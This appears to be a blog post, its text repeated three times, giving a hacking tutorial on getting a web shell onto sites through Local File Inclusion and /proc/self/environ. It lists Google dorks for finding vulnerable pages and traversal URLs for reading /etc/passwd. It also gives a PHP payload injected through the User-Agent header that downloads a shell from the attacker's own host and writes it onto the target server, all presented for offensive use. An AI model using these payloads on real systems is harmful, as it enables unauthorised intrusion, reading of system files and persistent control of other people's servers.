Basicly LFI stands for Local File Inclusion. This attack can allow
the attacker to gain access to the server by upload a shell to the
website.
I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/
II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=
III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>
IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
It should look like showed in the picture 2.
V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F
VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd
VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ
so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron
VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.
Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.
IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php
If that didn't work then try this:
http://www.site.com/urshellname.php
X. Now you have access to the server and it seems that you uploaded your shell successfully
Hit like if you have found it useful!
![Photo: Shell Via LFI And /Proc/Self/Environ
Basicly LFI stands for Local File Inclusion. This attack can allow the attacker to gain access to the server by upload a shell to the website.
I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/
II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=
III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>
IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
It should look like showed in the picture 2.
V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F
VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd
VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ
so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron
VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.
Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.
IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php
If that didn't work then try this:
http://www.site.com/urshellname.php
X. Now you have access to the server and it seems that you uploaded your shell successfully
Hit like if you have found it useful!](https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-prn2/t1/p526x296/1902712_277336082430462_1109672197_n.png)
I. This attack needs 3 main things to get it done:
> Shell --> You can find shells here:
http://www.r57.gen.tr/
> User Agent Switcher Addon -->
For Chrome:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
or FireFox:
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher
> Hosted Website that allows PHP -->
000WebHost:
http://www.000webhost.com/
Zymic:
http://www.zymic.com/
110MB:
http://www.110mb.com/
II. Here are some google dorks to find the vulnerability:
inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=
III. Now we have to create a new USER AGENT and put in User Agent field the following code:
<?php phpinfo(); ?>
IV. Description field is the name of the user agent so put what ever you want like showed in the picture 1.
Remove other fields and create another user agent and in User Agent field put this code:
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
It should look like showed in the picture 2.
V. Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.
To check if website is vulnerable write ../ in after the paremeter like this:
http://www.site.com/index.php?id=..%2F
VI. If you got [function.include] then the website may be vulnerable. So after getting the error remove ../ and replace with it /etc/passwd like:
http://www.site.com/index.php?id=%2Fetc%2Fpasswd
VII. If you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be:
/proc/self/environ
so the url will be something like this:
http://www.site.com/index.php?id=%2Fproc%2Fself%2Fenviron
VIII. Change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page, if you got a text similar to PHP VERSION then the site has excuted the code.
Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.
IX. To access your shell go to:
http://www.site.com/index.php?id=urshellname.php
If that didn't work then try this:
http://www.site.com/urshellname.php
X. Now you have access to the server and it seems that you uploaded your shell successfully
Hit like if you have found it useful!
No comments:
Post a Comment